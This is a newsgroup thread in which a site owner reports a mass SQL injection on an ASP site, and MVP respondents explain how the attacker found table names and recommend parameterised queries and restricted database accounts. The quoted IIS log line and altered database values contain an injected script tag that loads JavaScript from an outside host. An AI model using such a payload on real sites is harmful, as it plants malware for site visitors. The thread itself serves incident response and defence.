- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher&artist=Michael%20McDonald&type=%2 5&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...

1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside, but it
wasn't available.
What could have been in the js file to cause such an update?

2) I don't see how they could have known the Table name or the column names.
Same question as #1 I guess.

3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?

thanks

shank wrote:
> - - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
> GET /sresult.asp
> title=(Your%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher&artist=Michael%20McDonald&type=%2 5&category=%25&column=t_asc%3Cscript%20src=
> http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> My table was evidently hit with SQL Injection. I searched the IIS
> logs and found hundreds of the below instances. Questions...
>
> 1) The end result was my image columns were updated to reflect:
> Original data: files/icons/ps987_75.jpg
> Updated data: files/icons/ps987_75.jpg<script
> src=http://www.advabnr.com/b.js></script>
> Thousands of records were updated like the above.
> I tried downloading http://www.advabnr.com/b.js to see what's inside,
> but it wasn't available.
> What could have been in the js file to cause such an update?
>
http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/adva..._injection.pdf
http://www.nextgenss.com/papers/more..._injection.pdf


> 2) I don't see how they could have known the Table name or the column
> names. Same question as #1 I guess.

Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
>
> 3) I was and still am using a stored procedure on that page to SELECT
> from the table. How do I stop similar malicious efforts from happening
> again?

Use parameters:
http://groups.google.com/group/micro...fedf4e1efd63a6


--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"

"Bob Barrows [MVP]" wrote:
> shank wrote:
> > 2) I don't see how they could have known the Table name or the column
> > names. Same question as #1 I guess.
>
> Same answer - by causing error messagess that poor coding practice allow to
> be returned to the user.

No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.

It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)

If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.

Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.

"Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
> Here's an example of how it was originally injected into at least one web
> site and thus database:
>
> http://www.aspmessageboard.com/forum...997&P=1#894984
>
> The next post is my decoding of that and then Xander's post has a link to
> here:
> http://isc.sans.org/diary.html?n&storyid=4294
> that explains the whole process even more.
>

The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....

--
Mike Brind
Microsoft MVP - ASP/ASP.NET

"Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>
> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>> Here's an example of how it was originally injected into at least one web
>> site and thus database:
>>
>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>
>> The next post is my decoding of that and then Xander's post has a link to
>> here:
>> http://isc.sans.org/diary.html?n&storyid=4294
>> that explains the whole process even more.
>>
>
> The interesting thing is that ww.aspfaq.com, which is mentioned in the
> thread you linked to appears to have been a victim of something similar.
> Google results warn that aspfaq may harm your computer....
>

Ah. Not the one mentioned in the thread (which is plural).... but the one
that is frequently linked to from here.

Old Pedant wrote:
> "Bob Barrows [MVP]" wrote:
>> shank wrote:
>>> 2) I don't see how they could have known the Table name or the
>>> column names. Same question as #1 I guess.
>>
>> Same answer - by causing error messagess that poor coding practice
>> allow to be returned to the user.
>
> No, not really. Oh, it's poor coding practice, but the original
> injection (not seen here) is code that goes and reads the system
> tables and tries to discover all user table names and all user
> VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the
> JavaScript into all those fields.

Yes, that's the other way, and it is covered in the links I provided, which
is what I meant by "same answer".

>
> It's pretty sophisiticated, actually. But it's easily protected
> against by simply disallowing access to the sytem tables from the
> IUSR_xxx and IWAM_xxx accounts.

.... or whatever account is being used to connect to sql server.

> (Well, and of course by practicing
> good programming of the ASP page in the first place. But even with
> poor ASP code, if you set up the DB correctly the particular attack
> fails.)
>
> If you care, I think I can find a copy of the actual injection attack
> code still lurking, showing how it loops on all the tables and fields.

I've seen it - I just hadn't put the two cases together

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"

Mike Brind [MVP] wrote:
> "Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
> news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>>
>> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
>> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
>>>
>>>
http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
>>> http://isc.sans.org/diary.html?n&storyid=4294
>>> that explains the whole process even more.
>>>
>>
>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>> the thread you linked to appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....
>>
>
> Ah. Not the one mentioned in the thread (which is plural).... but
> the one that is frequently linked to from here.

Oh my! That is embarassing! I know Aaron used to recommend the use of
dynamic sql to execute stored procedures ... I'm sure he followed what
he preached, but I would have thought he knew to use a
limited-privileges account to connect to SQL. I'm going to give him the
benefit of the doubt and place the blame on the company that bought the
aspfaq site from him.

--
Microsoft MVP -- ASP/ASP.NET
Please reply to the newsgroup. The email account listed in my From
header is my spam trap, so I don't check it very often. You will get a
quicker response by posting to the newsgroup.

Mike Brind [MVP] wrote:
> "Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
> news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>>
>> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
>> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
>>>
>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
>>> http://isc.sans.org/diary.html?n&storyid=4294
>>> that explains the whole process even more.
>>>
>>
>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>> the thread you linked to appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....

They seem to have cleared that up. No more Google warnings there.

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"

"Bob Barrows [MVP]" <reb01501--at--NOyahoo.SPAMcom> wrote in message
news:ezUDU4V1IHA.2064--at--TK2MSFTNGP05.phx.gbl...
> Mike Brind [MVP] wrote:
>> "Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
>> news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>>>
>>> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
>>> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>>>> Here's an example of how it was originally injected into at least
>>>> one web site and thus database:
>>>>
>>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>>
>>>> The next post is my decoding of that and then Xander's post has a
>>>> link to here:
>>>> http://isc.sans.org/diary.html?n&storyid=4294
>>>> that explains the whole process even more.
>>>>
>>>
>>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>>> the thread you linked to appears to have been a victim of something
>>> similar. Google results warn that aspfaq may harm your computer....
>
> They seem to have cleared that up. No more Google warnings there.
>

That is indeed a relief.

Mike